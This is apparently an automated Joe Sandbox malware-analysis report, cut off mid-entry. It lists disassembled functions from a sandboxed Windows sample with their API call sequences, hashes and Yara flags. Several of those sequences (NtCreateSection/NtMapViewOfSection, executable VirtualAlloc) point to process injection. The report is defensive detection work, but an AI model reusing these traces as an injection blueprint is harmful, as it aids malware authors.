Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24

Function 0040162D Relevance: 10.7, APIs: 7, Instructions: 174
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24

Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24

Function 00401658 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24

Function 02D52619 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D52641
Module32First.KERNEL32(00000000,00000224), ref: 02D52661

Memory Dump Source

Source File: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d4b000_3.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 78bf4c9d847390978fd3882aecc6e54539540103ed3362c32ff85b6c5ab8f5e0
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 28F096352017256BDB203BF5988CB6E76ECAF49764F540528EE52925C0DBB0EC4A8A61

Function 02E4003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02E4024D

Strings

kernel32.dll, xrefs: 02E4008F, 02E40095
cess, xrefs: 02E4018D

Memory Dump Source

Source File: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_3.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4162b0db6398dce42ee52ff5a8cffee985a81d617a6aacbf776565c62243b148
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 1D526A74A01229DFDB64CF58D984BACBBB1BF09304F1480E9E94DAB351DB30AA85DF15

Function 02E40E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02E40223,?,?), ref: 02E40E19
SetErrorMode.KERNELBASE(00000000,?,?,02E40223,?,?), ref: 02E40E1E

Memory Dump Source

Source File: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_3.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 34d2163c0f80e3db41f3869534a0edd0d96cf44b0b8c56e1cf02f99a78c3ae5b
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: FBD0123114512877DB002A94DC09BCD7B1CDF05B66F008021FB0DD9080CB70954046E5

Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B

Function 004019E3 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F

Function 004019EE Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B

Function 004019FA Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F

Function 00401A09 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B

Function 00401A10 Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B

Function 02D522D8 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D52329

Memory Dump Source

Source File: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d4b000_3.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: edbdb1718f438c5781831366aacd8ff8878a93ba149311f658d969da08807d49
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 26112B79A00208EFDB01DF98C989E99BBF5EF08351F0580A4F9489B361D371EA54DF90

Non-executed Functions

Function 02E4092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02E40966
GetProcAddress., xrefs: 02E409DC, 02E409DF, 02E409E4
., xrefs: 02E4095F

Memory Dump Source

Source File: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_3.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 9c4938d02ebd62383350652b416c3c208af3add7d7c97cb5b734e251b94a7973
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 7A3169B6910609CFDB14CF99D880AAEBBF5FF48328F14905AD541A7310D771EA45CBA4

Function 00403406 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76158149653ef7ccaf6f6e8cdc44f7230b43f8846779de110674a4d92e5c0112
Instruction ID: fd1660de3178aaa42571e52dd098132a5b4ae735f6713b13b03932ff97ac1314
Opcode Fuzzy Hash: 76158149653ef7ccaf6f6e8cdc44f7230b43f8846779de110674a4d92e5c0112
Instruction Fuzzy Hash: B8519AE5D1D7825ED7134E2448C12EABF2CDA7371271401ABD9819E6D3E23D8B47839A

Function 02D51EF6 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d4b000_3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: d0d5a88a67d8da5ab7dd81c85e61482e1f640652c12bbc884f3218b613f0fe64
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 8D115A73340110AFDB54DE55DC80FA673EAEB89320B298165ED09CB355E7B5EC02CB60

Function 02E40D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 9cc7791a7db6650d00acc77f34470e8c756e4fde6da5c869130f1f5d14370f1f
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0D01F272A506008FDF25CF20EC04BAA33F5EF8630AF0590B4DA0A97281EB70A9458B80

Function 00402A9F Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2055148754.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3157a836501db8cf5431811897c06464d213d93ef77bce33c3680fcda06b18
Instruction ID: 0bf335201b4081c8990773322d5bc76c700d8f7add6b30564506a2c4c32383c8
Opcode Fuzzy Hash: de3157a836501db8cf5431811897c06464d213d93ef77bce33c3680fcda06b18
Instruction Fuzzy Hash: 9FB0922878D4A24AC2229B2C84921B9FF22AE57324354859181C04B282E7A848A7D204

Analysis Process: rcjjrraPID: 3580, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	44.4%
Signature Coverage:	0%
Total number of Nodes:	108
Total number of Limit Nodes:	5

Executed Functions

Function 00401524 Relevance: 10.7, APIs: 7, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65

Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65

Function 00401635 Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24

Function 0040162D Relevance: 10.7, APIs: 7, Instructions: 174
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24

Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24

Function 00401658 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

